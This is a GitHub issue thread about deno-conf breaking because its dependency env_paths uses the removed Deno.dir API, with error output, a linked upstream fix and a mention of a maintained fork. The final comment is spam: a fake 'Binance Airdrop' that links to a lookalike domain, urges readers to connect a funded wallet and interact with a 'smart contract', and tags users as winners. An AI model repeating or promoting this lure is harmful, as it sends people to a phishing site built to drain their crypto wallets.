### ISSUE TITLE
deno-conf is broken due to broken dependency deno-env-paths

### ISSUE THREAD

**Issue by grempe** [lemarier/deno-conf#1]
Unfortunately, this bug in the dependent library also breaks this library making it unusable.

https://github.com/lemarier/deno-env-paths/issues/1

It results in the following error:

```
error: TS2339 [ERROR]: Property 'dir' does not exist on type 'typeof Deno'.
const homedir: string | null = Deno.dir("home");
                                    ~~~
    at https://deno.land/x/env_paths@v0.1.0/mod.ts:6:37

TS2339 [ERROR]: Property 'dir' does not exist on type 'typeof Deno'.
const tmpdir: string | null = Deno.dir("tmp");
                                   ~~~
    at https://deno.land/x/env_paths@v0.1.0/mod.ts:7:36

Found 2 errors.
```

Would be great if you could do a quick fix and release of both.

This seems to be the fix?

https://github.com/denoland/deno/pull/8730/commits/26951a81193decedb61821fc69422f14f3e91db0

**Comment by chmac** [comment]
@lemarier Any plans to fix this? I see the issue is ~1 year old, seems like maybe you've moved on from this package and are no longer interested in maintaining the code?

**Comment by grempe** [comment]
@chmac I forked this library and made some improvements. Perhaps you can take a look and if its ok I can take some steps to publish it on deno.land as an alternative since this version appears unmaintained.

https://github.com/truestamp/deno-conf

**Comment by chmac** [comment]
@grempe Awesome, thanks for the shout out. I've starred your project. I solved my immediate conf requirements in deno, but I'll keep your fork on my list for future. If it's working, I would definitely encourage you to publish it as I tried getting this version to work and failed, so if you've fixed that issue, I'd say that's definitely worthy of publishing. 👍

**Comment by njangra144** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @FernandoFH, @hsheth2, @ANpts, @bee7171, @motechFR, @kankk, @saschajungfer
